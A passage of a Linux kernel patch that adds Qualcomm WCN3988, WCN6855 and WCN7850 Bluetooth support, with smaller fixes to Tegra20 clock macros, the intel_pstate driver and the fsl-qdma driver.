++		snprintf(config.fwname, sizeof(config.fwname),
++			 "qca/hpbtfw%02x.tlv", rom_ver);
++		break;
++	case QCA_WCN7850:
++		snprintf(config.fwname, sizeof(config.fwname),
++			 "qca/hmtbtfw%02x.tlv", rom_ver);
++		break;
++	default:
+ 		snprintf(config.fwname, sizeof(config.fwname),
+ 			 "qca/rampatch_%08x.bin", soc_ver);
+ 	}
+@@ -630,27 +651,48 @@ int qca_uart_setup(struct hci_dev *hdev, uint8_t baudrate,
+ 
+ 	/* Download NVM configuration */
+ 	config.type = TLV_TYPE_NVM;
+-	if (firmware_name)
++	if (firmware_name) {
+ 		snprintf(config.fwname, sizeof(config.fwname),
+ 			 "qca/%s", firmware_name);
+-	else if (qca_is_wcn399x(soc_type)) {
+-		if (ver.soc_id == QCA_WCN3991_SOC_ID) {
++	} else {
++		switch (soc_type) {
++		case QCA_WCN3990:
++		case QCA_WCN3991:
++		case QCA_WCN3998:
++			if (le32_to_cpu(ver.soc_id) == QCA_WCN3991_SOC_ID) {
++				snprintf(config.fwname, sizeof(config.fwname),
++					 "qca/crnv%02xu.bin", rom_ver);
++			} else {
++				snprintf(config.fwname, sizeof(config.fwname),
++					 "qca/crnv%02x.bin", rom_ver);
++			}
++			break;
++		case QCA_WCN3988:
+ 			snprintf(config.fwname, sizeof(config.fwname),
+-				 "qca/crnv%02xu.bin", rom_ver);
+-		} else {
++				 "qca/apnv%02x.bin", rom_ver);
++			break;
++		case QCA_QCA6390:
++			snprintf(config.fwname, sizeof(config.fwname),
++				 "qca/htnv%02x.bin", rom_ver);
++			break;
++		case QCA_WCN6750:
+ 			snprintf(config.fwname, sizeof(config.fwname),
+-				 "qca/crnv%02x.bin", rom_ver);
++				 "qca/msnv%02x.bin", rom_ver);
++			break;
++		case QCA_WCN6855:
++			snprintf(config.fwname, sizeof(config.fwname),
++				 "qca/hpnv%02x.bin", rom_ver);
++			break;
++		case QCA_WCN7850:
++			snprintf(config.fwname, sizeof(config.fwname),
++				 "qca/hmtnv%02x.bin", rom_ver);
++			break;
++
++		default:
++			snprintf(config.fwname, sizeof(config.fwname),
++				 "qca/nvm_%08x.bin", soc_ver);
+ 		}
+ 	}
+-	else if (soc_type == QCA_QCA6390)
+-		snprintf(config.fwname, sizeof(config.fwname),
+-			 "qca/htnv%02x.bin", rom_ver);
+-	else if (soc_type == QCA_WCN6750)
+-		snprintf(config.fwname, sizeof(config.fwname),
+-			 "qca/msnv%02x.bin", rom_ver);
+-	else
+-		snprintf(config.fwname, sizeof(config.fwname),
+-			 "qca/nvm_%08x.bin", soc_ver);
+ 
+ 	err = qca_download_firmware(hdev, &config, soc_type, rom_ver);
+ 	if (err < 0) {
+@@ -658,16 +700,25 @@ int qca_uart_setup(struct hci_dev *hdev, uint8_t baudrate,
+ 		return err;
+ 	}
+ 
+-	if (soc_type >= QCA_WCN3991) {
++	switch (soc_type) {
++	case QCA_WCN3991:
++	case QCA_QCA6390:
++	case QCA_WCN6750:
++	case QCA_WCN6855:
++	case QCA_WCN7850:
+ 		err = qca_disable_soc_logging(hdev);
+ 		if (err < 0)
+ 			return err;
++		break;
++	default:
++		break;
+ 	}
+ 
+ 	/* WCN399x and WCN6750 supports the Microsoft vendor extension with 0xFD70 as the
+ 	 * VsMsftOpCode.
+ 	 */
+ 	switch (soc_type) {
++	case QCA_WCN3988:
+ 	case QCA_WCN3990:
+ 	case QCA_WCN3991:
+ 	case QCA_WCN3998:
+@@ -685,11 +736,18 @@ int qca_uart_setup(struct hci_dev *hdev, uint8_t baudrate,
+ 		return err;
+ 	}
+ 
+-	if (soc_type == QCA_WCN3991 || soc_type == QCA_WCN6750) {
++	switch (soc_type) {
++	case QCA_WCN3991:
++	case QCA_WCN6750:
++	case QCA_WCN6855:
++	case QCA_WCN7850:
+ 		/* get fw build info */
+ 		err = qca_read_fw_build_info(hdev);
+ 		if (err < 0)
+ 			return err;
++		break;
++	default:
++		break;
+ 	}
+ 
+ 	bt_dev_info(hdev, "QCA setup on UART is completed");
+diff --git a/drivers/bluetooth/btqca.h b/drivers/bluetooth/btqca.h
+index 61e9a50e66ae1..03bff5c0059de 100644
+--- a/drivers/bluetooth/btqca.h
++++ b/drivers/bluetooth/btqca.h
+@@ -142,11 +142,14 @@ enum qca_btsoc_type {
+ 	QCA_INVALID = -1,
+ 	QCA_AR3002,
+ 	QCA_ROME,
++	QCA_WCN3988,
+ 	QCA_WCN3990,
+ 	QCA_WCN3998,
+ 	QCA_WCN3991,
+ 	QCA_QCA6390,
+ 	QCA_WCN6750,
++	QCA_WCN6855,
++	QCA_WCN7850,
+ };
+ 
+ #if IS_ENABLED(CONFIG_BT_QCA)
+@@ -159,16 +162,6 @@ int qca_read_soc_version(struct hci_dev *hdev, struct qca_btsoc_version *ver,
+ 			 enum qca_btsoc_type);
+ int qca_set_bdaddr(struct hci_dev *hdev, const bdaddr_t *bdaddr);
+ int qca_send_pre_shutdown_cmd(struct hci_dev *hdev);
+-static inline bool qca_is_wcn399x(enum qca_btsoc_type soc_type)
+-{
+-	return soc_type == QCA_WCN3990 || soc_type == QCA_WCN3991 ||
+-	       soc_type == QCA_WCN3998;
+-}
+-static inline bool qca_is_wcn6750(enum qca_btsoc_type soc_type)
+-{
+-	return soc_type == QCA_WCN6750;
+-}
+-
+ #else
+ 
+ static inline int qca_set_bdaddr_rome(struct hci_dev *hdev, const bdaddr_t *bdaddr)
+@@ -196,16 +189,6 @@ static inline int qca_set_bdaddr(struct hci_dev *hdev, const bdaddr_t *bdaddr)
+ 	return -EOPNOTSUPP;
+ }
+ 
+-static inline bool qca_is_wcn399x(enum qca_btsoc_type soc_type)
+-{
+-	return false;
+-}
+-
+-static inline bool qca_is_wcn6750(enum qca_btsoc_type soc_type)
+-{
+-	return false;
+-}
+-
+ static inline int qca_send_pre_shutdown_cmd(struct hci_dev *hdev)
+ {
+ 	return -EOPNOTSUPP;
+diff --git a/drivers/bluetooth/hci_qca.c b/drivers/bluetooth/hci_qca.c
+index 76ceb8a0183d1..8bfef7f81b417 100644
+--- a/drivers/bluetooth/hci_qca.c
++++ b/drivers/bluetooth/hci_qca.c
+@@ -7,6 +7,7 @@
+  *
+  *  Copyright (C) 2007 Texas Instruments, Inc.
+  *  Copyright (c) 2010, 2012, 2018 The Linux Foundation. All rights reserved.
++ *  Copyright (c) 2023 Qualcomm Innovation Center, Inc. All rights reserved.
+  *
+  *  Acknowledgements:
+  *  This file is based on hci_ll.c, which was...
+@@ -606,9 +607,18 @@ static int qca_open(struct hci_uart *hu)
+ 	if (hu->serdev) {
+ 		qcadev = serdev_device_get_drvdata(hu->serdev);
+ 
+-		if (qca_is_wcn399x(qcadev->btsoc_type) ||
+-		    qca_is_wcn6750(qcadev->btsoc_type))
++		switch (qcadev->btsoc_type) {
++		case QCA_WCN3988:
++		case QCA_WCN3990:
++		case QCA_WCN3991:
++		case QCA_WCN3998:
++		case QCA_WCN6750:
+ 			hu->init_speed = qcadev->init_speed;
++			break;
++
++		default:
++			break;
++		}
+ 
+ 		if (qcadev->oper_speed)
+ 			hu->oper_speed = qcadev->oper_speed;
+@@ -1314,11 +1324,20 @@ static int qca_set_baudrate(struct hci_dev *hdev, uint8_t baudrate)
+ 		      msecs_to_jiffies(CMD_TRANS_TIMEOUT_MS));
+ 
+ 	/* Give the controller time to process the request */
+-	if (qca_is_wcn399x(qca_soc_type(hu)) ||
+-	    qca_is_wcn6750(qca_soc_type(hu)))
++	switch (qca_soc_type(hu)) {
++	case QCA_WCN3988:
++	case QCA_WCN3990:
++	case QCA_WCN3991:
++	case QCA_WCN3998:
++	case QCA_WCN6750:
++	case QCA_WCN6855:
++	case QCA_WCN7850:
+ 		usleep_range(1000, 10000);
+-	else
++		break;
++
++	default:
+ 		msleep(300);
++	}
+ 
+ 	return 0;
+ }
+@@ -1391,12 +1410,20 @@ static unsigned int qca_get_speed(struct hci_uart *hu,
+ 
+ static int qca_check_speeds(struct hci_uart *hu)
+ {
+-	if (qca_is_wcn399x(qca_soc_type(hu)) ||
+-	    qca_is_wcn6750(qca_soc_type(hu))) {
++	switch (qca_soc_type(hu)) {
++	case QCA_WCN3988:
++	case QCA_WCN3990:
++	case QCA_WCN3991:
++	case QCA_WCN3998:
++	case QCA_WCN6750:
++	case QCA_WCN6855:
++	case QCA_WCN7850:
+ 		if (!qca_get_speed(hu, QCA_INIT_SPEED) &&
+ 		    !qca_get_speed(hu, QCA_OPER_SPEED))
+ 			return -EINVAL;
+-	} else {
++		break;
++
++	default:
+ 		if (!qca_get_speed(hu, QCA_INIT_SPEED) ||
+ 		    !qca_get_speed(hu, QCA_OPER_SPEED))
+ 			return -EINVAL;
+@@ -1425,13 +1452,29 @@ static int qca_set_speed(struct hci_uart *hu, enum qca_speed_type speed_type)
+ 		/* Disable flow control for wcn3990 to deassert RTS while
+ 		 * changing the baudrate of chip and host.
+ 		 */
+-		if (qca_is_wcn399x(soc_type) ||
+-		    qca_is_wcn6750(soc_type))
++		switch (soc_type) {
++		case QCA_WCN3988:
++		case QCA_WCN3990:
++		case QCA_WCN3991:
++		case QCA_WCN3998:
++		case QCA_WCN6750:
++		case QCA_WCN6855:
++		case QCA_WCN7850:
+ 			hci_uart_set_flow_control(hu, true);
++			break;
+ 
+-		if (soc_type == QCA_WCN3990) {
++		default:
++			break;
++		}
++
++		switch (soc_type) {
++		case QCA_WCN3990:
+ 			reinit_completion(&qca->drop_ev_comp);
+ 			set_bit(QCA_DROP_VENDOR_EVENT, &qca->flags);
++			break;
++
++		default:
++			break;
+ 		}
+ 
+ 		qca_baudrate = qca_get_baudrate_value(speed);
+@@ -1443,11 +1486,23 @@ static int qca_set_speed(struct hci_uart *hu, enum qca_speed_type speed_type)
+ 		host_set_baudrate(hu, speed);
+ 
+ error:
+-		if (qca_is_wcn399x(soc_type) ||
+-		    qca_is_wcn6750(soc_type))
++		switch (soc_type) {
++		case QCA_WCN3988:
++		case QCA_WCN3990:
++		case QCA_WCN3991:
++		case QCA_WCN3998:
++		case QCA_WCN6750:
++		case QCA_WCN6855:
++		case QCA_WCN7850:
+ 			hci_uart_set_flow_control(hu, false);
++			break;
+ 
+-		if (soc_type == QCA_WCN3990) {
++		default:
++			break;
++		}
++
++		switch (soc_type) {
++		case QCA_WCN3990:
+ 			/* Wait for the controller to send the vendor event
+ 			 * for the baudrate change command.
+ 			 */
+@@ -1459,6 +1514,10 @@ static int qca_set_speed(struct hci_uart *hu, enum qca_speed_type speed_type)
+ 			}
+ 
+ 			clear_bit(QCA_DROP_VENDOR_EVENT, &qca->flags);
++			break;
++
++		default:
++			break;
+ 		}
+ 	}
+ 
+@@ -1620,12 +1679,20 @@ static int qca_regulator_init(struct hci_uart *hu)
+ 		}
+ 	}
+ 
+-	if (qca_is_wcn399x(soc_type)) {
++	switch (soc_type) {
++	case QCA_WCN3988:
++	case QCA_WCN3990:
++	case QCA_WCN3991:
++	case QCA_WCN3998:
+ 		/* Forcefully enable wcn399x to enter in to boot mode. */
+ 		host_set_baudrate(hu, 2400);
+ 		ret = qca_send_power_pulse(hu, false);
+ 		if (ret)
+ 			return ret;
++		break;
++
++	default:
++		break;
+ 	}
+ 
+ 	/* For wcn6750 need to enable gpio bt_en */
+@@ -1642,10 +1709,18 @@ static int qca_regulator_init(struct hci_uart *hu)
+ 
+ 	qca_set_speed(hu, QCA_INIT_SPEED);
+ 
+-	if (qca_is_wcn399x(soc_type)) {
++	switch (soc_type) {
++	case QCA_WCN3988:
++	case QCA_WCN3990:
++	case QCA_WCN3991:
++	case QCA_WCN3998:
+ 		ret = qca_send_power_pulse(hu, true);
+ 		if (ret)
+ 			return ret;
++		break;
++
++	default:
++		break;
+ 	}
+ 
+ 	/* Now the device is in ready state to communicate with host.
+@@ -1679,10 +1754,18 @@ static int qca_power_on(struct hci_dev *hdev)
+ 	if (!hu->serdev)
+ 		return 0;
+ 
+-	if (qca_is_wcn399x(soc_type) ||
+-	    qca_is_wcn6750(soc_type)) {
++	switch (soc_type) {
++	case QCA_WCN3988:
++	case QCA_WCN3990:
++	case QCA_WCN3991:
++	case QCA_WCN3998:
++	case QCA_WCN6750:
++	case QCA_WCN6855:
++	case QCA_WCN7850:
+ 		ret = qca_regulator_init(hu);
+-	} else {
++		break;
++
++	default:
+ 		qcadev = serdev_device_get_drvdata(hu->serdev);
+ 		if (qcadev->bt_en) {
+ 			gpiod_set_value_cansleep(qcadev->bt_en, 1);
+@@ -1705,6 +1788,7 @@ static int qca_setup(struct hci_uart *hu)
+ 	const char *firmware_name = qca_get_firmware_name(hu);
+ 	int ret;
+ 	struct qca_btsoc_version ver;
++	const char *soc_name;
+ 
+ 	ret = qca_check_speeds(hu);
+ 	if (ret)
+@@ -1719,9 +1803,30 @@ static int qca_setup(struct hci_uart *hu)
+ 	 */
+ 	set_bit(HCI_QUIRK_SIMULTANEOUS_DISCOVERY, &hdev->quirks);
+ 
+-	bt_dev_info(hdev, "setting up %s",
+-		qca_is_wcn399x(soc_type) ? "wcn399x" :
+-		(soc_type == QCA_WCN6750) ? "wcn6750" : "ROME/QCA6390");
++	switch (soc_type) {
++	case QCA_WCN3988:
++	case QCA_WCN3990:
++	case QCA_WCN3991:
++	case QCA_WCN3998:
++		soc_name = "wcn399x";
++		break;
++
++	case QCA_WCN6750:
++		soc_name = "wcn6750";
++		break;
++
++	case QCA_WCN6855:
++		soc_name = "wcn6855";
++		break;
++
++	case QCA_WCN7850:
++		soc_name = "wcn7850";
++		break;
++
++	default:
++		soc_name = "ROME/QCA6390";
++	}
++	bt_dev_info(hdev, "setting up %s", soc_name);
+ 
+ 	qca->memdump_state = QCA_MEMDUMP_IDLE;
+ 
+@@ -1732,15 +1837,33 @@ static int qca_setup(struct hci_uart *hu)
+ 
+ 	clear_bit(QCA_SSR_TRIGGERED, &qca->flags);
+ 
+-	if (qca_is_wcn399x(soc_type) ||
+-	    qca_is_wcn6750(soc_type)) {
+-		set_bit(HCI_QUIRK_USE_BDADDR_PROPERTY, &hdev->quirks);
++	switch (soc_type) {
++	case QCA_WCN3988:
++	case QCA_WCN3990:
++	case QCA_WCN3991:
++	case QCA_WCN3998:
++	case QCA_WCN6750:
++	case QCA_WCN6855:
++	case QCA_WCN7850:
++
++		/* Set BDA quirk bit for reading BDA value from fwnode property
++		 * only if that property exist in DT.
++		 */
++		if (fwnode_property_present(dev_fwnode(hdev->dev.parent), "local-bd-address")) {
++			set_bit(HCI_QUIRK_USE_BDADDR_PROPERTY, &hdev->quirks);
++			bt_dev_info(hdev, "setting quirk bit to read BDA from fwnode later");
++		} else {
++			bt_dev_dbg(hdev, "local-bd-address` is not present in the devicetree so not setting quirk bit for BDA");
++		}
++
+ 		hci_set_aosp_capable(hdev);
+ 
+ 		ret = qca_read_soc_version(hdev, &ver, soc_type);
+ 		if (ret)
+ 			goto out;
+-	} else {
++		break;
++
++	default:
+ 		qca_set_speed(hu, QCA_INIT_SPEED);
+ 	}
+ 
+@@ -1754,8 +1877,17 @@ static int qca_setup(struct hci_uart *hu)
+ 		qca_baudrate = qca_get_baudrate_value(speed);
+ 	}
+ 
+-	if (!(qca_is_wcn399x(soc_type) ||
+-	     qca_is_wcn6750(soc_type))) {
++	switch (soc_type) {
++	case QCA_WCN3988:
++	case QCA_WCN3990:
++	case QCA_WCN3991:
++	case QCA_WCN3998:
++	case QCA_WCN6750:
++	case QCA_WCN6855:
++	case QCA_WCN7850:
++		break;
++
++	default:
+ 		/* Get QCA version information */
+ 		ret = qca_read_soc_version(hdev, &ver, soc_type);
+ 		if (ret)
+@@ -1824,7 +1956,18 @@ static const struct hci_uart_proto qca_proto = {
+ 	.dequeue	= qca_dequeue,
+ };
+ 
+-static const struct qca_device_data qca_soc_data_wcn3990 = {
++static const struct qca_device_data qca_soc_data_wcn3988 __maybe_unused = {
++	.soc_type = QCA_WCN3988,
++	.vregs = (struct qca_vreg []) {
++		{ "vddio", 15000  },
++		{ "vddxo", 80000  },
++		{ "vddrf", 300000 },
++		{ "vddch0", 450000 },
++	},
++	.num_vregs = 4,
++};
++
++static const struct qca_device_data qca_soc_data_wcn3990 __maybe_unused = {
+ 	.soc_type = QCA_WCN3990,
+ 	.vregs = (struct qca_vreg []) {
+ 		{ "vddio", 15000  },
+@@ -1835,7 +1978,7 @@ static const struct qca_device_data qca_soc_data_wcn3990 = {
+ 	.num_vregs = 4,
+ };
+ 
+-static const struct qca_device_data qca_soc_data_wcn3991 = {
++static const struct qca_device_data qca_soc_data_wcn3991 __maybe_unused = {
+ 	.soc_type = QCA_WCN3991,
+ 	.vregs = (struct qca_vreg []) {
+ 		{ "vddio", 15000  },
+@@ -1847,7 +1990,7 @@ static const struct qca_device_data qca_soc_data_wcn3991 = {
+ 	.capabilities = QCA_CAP_WIDEBAND_SPEECH | QCA_CAP_VALID_LE_STATES,
+ };
+ 
+-static const struct qca_device_data qca_soc_data_wcn3998 = {
++static const struct qca_device_data qca_soc_data_wcn3998 __maybe_unused = {
+ 	.soc_type = QCA_WCN3998,
+ 	.vregs = (struct qca_vreg []) {
+ 		{ "vddio", 10000  },
+@@ -1858,13 +2001,13 @@ static const struct qca_device_data qca_soc_data_wcn3998 = {
+ 	.num_vregs = 4,
+ };
+ 
+-static const struct qca_device_data qca_soc_data_qca6390 = {
++static const struct qca_device_data qca_soc_data_qca6390 __maybe_unused = {
+ 	.soc_type = QCA_QCA6390,
+ 	.num_vregs = 0,
+ 	.capabilities = QCA_CAP_WIDEBAND_SPEECH | QCA_CAP_VALID_LE_STATES,
+ };
+ 
+-static const struct qca_device_data qca_soc_data_wcn6750 = {
++static const struct qca_device_data qca_soc_data_wcn6750 __maybe_unused = {
+ 	.soc_type = QCA_WCN6750,
+ 	.vregs = (struct qca_vreg []) {
+ 		{ "vddio", 5000 },
+@@ -1881,6 +2024,34 @@ static const struct qca_device_data qca_soc_data_wcn6750 = {
+ 	.capabilities = QCA_CAP_WIDEBAND_SPEECH | QCA_CAP_VALID_LE_STATES,
+ };
+ 
++static const struct qca_device_data qca_soc_data_wcn6855 = {
++	.soc_type = QCA_WCN6855,
++	.vregs = (struct qca_vreg []) {
++		{ "vddio", 5000 },
++		{ "vddbtcxmx", 126000 },
++		{ "vddrfacmn", 12500 },
++		{ "vddrfa0p8", 102000 },
++		{ "vddrfa1p7", 302000 },
++		{ "vddrfa1p2", 257000 },
++	},
++	.num_vregs = 6,
++	.capabilities = QCA_CAP_WIDEBAND_SPEECH | QCA_CAP_VALID_LE_STATES,
++};
++
++static const struct qca_device_data qca_soc_data_wcn7850 __maybe_unused = {
++	.soc_type = QCA_WCN7850,
++	.vregs = (struct qca_vreg []) {
++		{ "vddio", 5000 },
++		{ "vddaon", 26000 },
++		{ "vdddig", 126000 },
++		{ "vddrfa0p8", 102000 },
++		{ "vddrfa1p2", 257000 },
++		{ "vddrfa1p9", 302000 },
++	},
++	.num_vregs = 6,
++	.capabilities = QCA_CAP_WIDEBAND_SPEECH | QCA_CAP_VALID_LE_STATES,
++};
++
+ static void qca_power_shutdown(struct hci_uart *hu)
+ {
+ 	struct qca_serdev *qcadev;
+@@ -1906,11 +2077,18 @@ static void qca_power_shutdown(struct hci_uart *hu)
+ 
+ 	qcadev = serdev_device_get_drvdata(hu->serdev);
+ 
+-	if (qca_is_wcn399x(soc_type)) {
++	switch (soc_type) {
++	case QCA_WCN3988:
++	case QCA_WCN3990:
++	case QCA_WCN3991:
++	case QCA_WCN3998:
+ 		host_set_baudrate(hu, 2400);
+ 		qca_send_power_pulse(hu, false);
+ 		qca_regulator_disable(qcadev);
+-	} else if (soc_type == QCA_WCN6750) {
++		break;
++
++	case QCA_WCN6750:
++	case QCA_WCN6855:
+ 		gpiod_set_value_cansleep(qcadev->bt_en, 0);
+ 		msleep(100);
+ 		qca_regulator_disable(qcadev);
+@@ -1918,7 +2096,9 @@ static void qca_power_shutdown(struct hci_uart *hu)
+ 			sw_ctrl_state = gpiod_get_value_cansleep(qcadev->sw_ctrl);
+ 			bt_dev_dbg(hu->hdev, "SW_CTRL is %d", sw_ctrl_state);
+ 		}
+-	} else if (qcadev->bt_en) {
++		break;
++
++	default:
+ 		gpiod_set_value_cansleep(qcadev->bt_en, 0);
+ 	}
+ 
+@@ -2043,10 +2223,19 @@ static int qca_serdev_probe(struct serdev_device *serdev)
+ 	if (!qcadev->oper_speed)
+ 		BT_DBG("UART will pick default operating speed");
+ 
+-	if (data &&
+-	    (qca_is_wcn399x(data->soc_type) ||
+-	    qca_is_wcn6750(data->soc_type))) {
++	if (data)
+ 		qcadev->btsoc_type = data->soc_type;
++	else
++		qcadev->btsoc_type = QCA_ROME;
++
++	switch (qcadev->btsoc_type) {
++	case QCA_WCN3988:
++	case QCA_WCN3990:
++	case QCA_WCN3991:
++	case QCA_WCN3998:
++	case QCA_WCN6750:
++	case QCA_WCN6855:
++	case QCA_WCN7850:
+ 		qcadev->bt_power = devm_kzalloc(&serdev->dev,
+ 						sizeof(struct qca_power),
+ 						GFP_KERNEL);
+@@ -2065,14 +2254,19 @@ static int qca_serdev_probe(struct serdev_device *serdev)
+ 
+ 		qcadev->bt_en = devm_gpiod_get_optional(&serdev->dev, "enable",
+ 					       GPIOD_OUT_LOW);
+-		if (IS_ERR_OR_NULL(qcadev->bt_en) && data->soc_type == QCA_WCN6750) {
++		if (IS_ERR_OR_NULL(qcadev->bt_en) &&
++		    (data->soc_type == QCA_WCN6750 ||
++		     data->soc_type == QCA_WCN6855)) {
+ 			dev_err(&serdev->dev, "failed to acquire BT_EN gpio\n");
+ 			power_ctrl_enabled = false;
+ 		}
+ 
+ 		qcadev->sw_ctrl = devm_gpiod_get_optional(&serdev->dev, "swctrl",
+ 					       GPIOD_IN);
+-		if (IS_ERR_OR_NULL(qcadev->sw_ctrl) && data->soc_type == QCA_WCN6750)
++		if (IS_ERR_OR_NULL(qcadev->sw_ctrl) &&
++		    (data->soc_type == QCA_WCN6750 ||
++		     data->soc_type == QCA_WCN6855 ||
++		     data->soc_type == QCA_WCN7850))
+ 			dev_warn(&serdev->dev, "failed to acquire SW_CTRL gpio\n");
+ 
+ 		qcadev->susclk = devm_clk_get_optional(&serdev->dev, NULL);
+@@ -2086,12 +2280,9 @@ static int qca_serdev_probe(struct serdev_device *serdev)
+ 			BT_ERR("wcn3990 serdev registration failed");
+ 			return err;
+ 		}
+-	} else {
+-		if (data)
+-			qcadev->btsoc_type = data->soc_type;
+-		else
+-			qcadev->btsoc_type = QCA_ROME;
++		break;
+ 
++	default:
+ 		qcadev->bt_en = devm_gpiod_get_optional(&serdev->dev, "enable",
+ 					       GPIOD_OUT_LOW);
+ 		if (IS_ERR_OR_NULL(qcadev->bt_en)) {
+@@ -2147,12 +2338,24 @@ static void qca_serdev_remove(struct serdev_device *serdev)
+ 	struct qca_serdev *qcadev = serdev_device_get_drvdata(serdev);
+ 	struct qca_power *power = qcadev->bt_power;
+ 
+-	if ((qca_is_wcn399x(qcadev->btsoc_type) ||
+-	     qca_is_wcn6750(qcadev->btsoc_type)) &&
+-	     power->vregs_on)
+-		qca_power_shutdown(&qcadev->serdev_hu);
+-	else if (qcadev->susclk)
+-		clk_disable_unprepare(qcadev->susclk);
++	switch (qcadev->btsoc_type) {
++	case QCA_WCN3988:
++	case QCA_WCN3990:
++	case QCA_WCN3991:
++	case QCA_WCN3998:
++	case QCA_WCN6750:
++	case QCA_WCN6855:
++	case QCA_WCN7850:
++		if (power->vregs_on) {
++			qca_power_shutdown(&qcadev->serdev_hu);
++			break;
++		}
++		fallthrough;
++
++	default:
++		if (qcadev->susclk)
++			clk_disable_unprepare(qcadev->susclk);
++	}
+ 
+ 	hci_uart_unregister_device(&qcadev->serdev_hu);
+ }
+@@ -2329,10 +2532,13 @@ static const struct of_device_id qca_bluetooth_of_match[] = {
+ 	{ .compatible = "qcom,qca6174-bt" },
+ 	{ .compatible = "qcom,qca6390-bt", .data = &qca_soc_data_qca6390},
+ 	{ .compatible = "qcom,qca9377-bt" },
++	{ .compatible = "qcom,wcn3988-bt", .data = &qca_soc_data_wcn3988},
+ 	{ .compatible = "qcom,wcn3990-bt", .data = &qca_soc_data_wcn3990},
+ 	{ .compatible = "qcom,wcn3991-bt", .data = &qca_soc_data_wcn3991},
+ 	{ .compatible = "qcom,wcn3998-bt", .data = &qca_soc_data_wcn3998},
+ 	{ .compatible = "qcom,wcn6750-bt", .data = &qca_soc_data_wcn6750},
++	{ .compatible = "qcom,wcn6855-bt", .data = &qca_soc_data_wcn6855},
++	{ .compatible = "qcom,wcn7850-bt", .data = &qca_soc_data_wcn7850},
+ 	{ /* sentinel */ }
+ };
+ MODULE_DEVICE_TABLE(of, qca_bluetooth_of_match);
+diff --git a/drivers/clk/tegra/clk-tegra20.c b/drivers/clk/tegra/clk-tegra20.c
+index 422d782475532..dcacc5064d339 100644
+--- a/drivers/clk/tegra/clk-tegra20.c
++++ b/drivers/clk/tegra/clk-tegra20.c
+@@ -21,24 +21,24 @@
+ #define MISC_CLK_ENB 0x48
+ 
+ #define OSC_CTRL 0x50
+-#define OSC_CTRL_OSC_FREQ_MASK (3<<30)
+-#define OSC_CTRL_OSC_FREQ_13MHZ (0<<30)
+-#define OSC_CTRL_OSC_FREQ_19_2MHZ (1<<30)
+-#define OSC_CTRL_OSC_FREQ_12MHZ (2<<30)
+-#define OSC_CTRL_OSC_FREQ_26MHZ (3<<30)
+-#define OSC_CTRL_MASK (0x3f2 | OSC_CTRL_OSC_FREQ_MASK)
+-
+-#define OSC_CTRL_PLL_REF_DIV_MASK (3<<28)
+-#define OSC_CTRL_PLL_REF_DIV_1		(0<<28)
+-#define OSC_CTRL_PLL_REF_DIV_2		(1<<28)
+-#define OSC_CTRL_PLL_REF_DIV_4		(2<<28)
++#define OSC_CTRL_OSC_FREQ_MASK (3u<<30)
++#define OSC_CTRL_OSC_FREQ_13MHZ (0u<<30)
++#define OSC_CTRL_OSC_FREQ_19_2MHZ (1u<<30)
++#define OSC_CTRL_OSC_FREQ_12MHZ (2u<<30)
++#define OSC_CTRL_OSC_FREQ_26MHZ (3u<<30)
++#define OSC_CTRL_MASK (0x3f2u | OSC_CTRL_OSC_FREQ_MASK)
++
++#define OSC_CTRL_PLL_REF_DIV_MASK	(3u<<28)
++#define OSC_CTRL_PLL_REF_DIV_1		(0u<<28)
++#define OSC_CTRL_PLL_REF_DIV_2		(1u<<28)
++#define OSC_CTRL_PLL_REF_DIV_4		(2u<<28)
+ 
+ #define OSC_FREQ_DET 0x58
+-#define OSC_FREQ_DET_TRIG (1<<31)
++#define OSC_FREQ_DET_TRIG (1u<<31)
+ 
+ #define OSC_FREQ_DET_STATUS 0x5c
+-#define OSC_FREQ_DET_BUSY (1<<31)
+-#define OSC_FREQ_DET_CNT_MASK 0xFFFF
++#define OSC_FREQ_DET_BUSYu (1<<31)
++#define OSC_FREQ_DET_CNT_MASK 0xFFFFu
+ 
+ #define TEGRA20_CLK_PERIPH_BANKS	3
+ 
+diff --git a/drivers/cpufreq/intel_pstate.c b/drivers/cpufreq/intel_pstate.c
+index abdd26f7d04c9..5771f3fc6115d 100644
+--- a/drivers/cpufreq/intel_pstate.c
++++ b/drivers/cpufreq/intel_pstate.c
+@@ -2952,6 +2952,9 @@ static void intel_cpufreq_adjust_perf(unsigned int cpunum,
+ 	if (min_pstate < cpu->min_perf_ratio)
+ 		min_pstate = cpu->min_perf_ratio;
+ 
++	if (min_pstate > cpu->max_perf_ratio)
++		min_pstate = cpu->max_perf_ratio;
++
+ 	max_pstate = min(cap_pstate, cpu->max_perf_ratio);
+ 	if (max_pstate < min_pstate)
+ 		max_pstate = min_pstate;
+diff --git a/drivers/dma/fsl-qdma.c b/drivers/dma/fsl-qdma.c
+index f383f219ed008..7082a5a6814a4 100644
+--- a/drivers/dma/fsl-qdma.c
++++ b/drivers/dma/fsl-qdma.c
+@@ -109,6 +109,7 @@
+ #define FSL_QDMA_CMD_WTHROTL_OFFSET	20
+ #define FSL_QDMA_CMD_DSEN_OFFSET	19
+ #define FSL_QDMA_CMD_LWC_OFFSET		16
++#define FSL_QDMA_CMD_PF			BIT(17)
+ 
+ /* Field definition for Descriptor status */
+ #define QDMA_CCDF_STATUS_RTE		BIT(5)
+@@ -384,7 +385,8 @@ static void fsl_qdma_comp_fill_memcpy(struct fsl_qdma_comp *fsl_comp,
+ 	qdma_csgf_set_f(csgf_dest, len);
+ 	/* Descriptor Buffer */
+ 	cmd = cpu_to_le32(FSL_QDMA_CMD_RWTTYPE <<
+-			  FSL_QDMA_CMD_RWTTYPE_OFFSET);
++			  FSL_QDMA_CMD_RWTTYPE_OFFSET) |
++			  FSL_QDMA_CMD_PF;
+ 	sdf->data = QDMA_SDDF_CMD(cmd);
+ 
+ 	cmd = cpu_to_le32(FSL_QDMA_CMD_RWTTYPE <<
+@@ -1201,10 +1203,6 @@ static int fsl_qdma_probe(struct platform_device *pdev)
+ 	if (!fsl_qdma->queue)
+ 		return -ENOMEM;
+ 
+-	ret = fsl_qdma_irq_init(pdev, fsl_qdma);
+-	if (ret)
+-		return ret;
+-
+ 	fsl_qdma->irq_base = platform_get_irq_byname(pdev, "qdma-queue0");
+ 	if (fsl_qdma->irq_base < 0)
+ 		return fsl_qdma->irq_base;
+@@ -1243,16 +1241,19 @@ static int fsl_qdma_probe(struct platform_device *pdev)
+ 
+ 	platform_set_drvdata(pdev, fsl_qdma);
+ 
+-	ret = dma_async_device_register(&fsl_qdma->dma_dev);
++	ret = fsl_qdma_reg_init(fsl_qdma);
+ 	if (ret) {
+-		dev_err(&pdev->dev,
+-			"Can't register NXP Layerscape qDMA engine.\n");
++		dev_err(&pdev->dev, "Can't Initialize the qDMA engine.\n");
+ 		return ret;
+ 	}
+ 
